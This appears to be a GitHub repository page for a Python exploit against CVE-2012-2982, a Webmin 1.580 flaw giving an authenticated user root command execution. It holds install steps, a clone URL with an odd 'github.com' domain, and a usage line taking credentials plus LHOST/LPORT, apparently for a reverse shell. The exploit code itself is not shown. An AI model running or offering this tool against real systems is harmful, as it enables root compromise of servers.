Skip to content

OstojaOfficial/CVE-2012-2982

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 

Repository files navigation

CVE-2012-2982

This python script is written for vulnerability in Webmin 1.580, CVE-2012-2982. The vulnerability exists in the /file/show.cgi component and allows an authenticated user, with access to the File Manager Module, to execute arbitrary commands with root privileges.

Installation

Tested python version: Python 3.8.5

Required pip package: secrets

git clone https://github.com/OstojaOfficial/CVE-2012-2982.git

pip3 install -r requirements.txt

Usage

To run the exploit use the command bellow:

python3 exploit.py <IP> <Username> <Password> <LHOST> <LPORT>

About

Python exploit for CVE-2012-2982

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages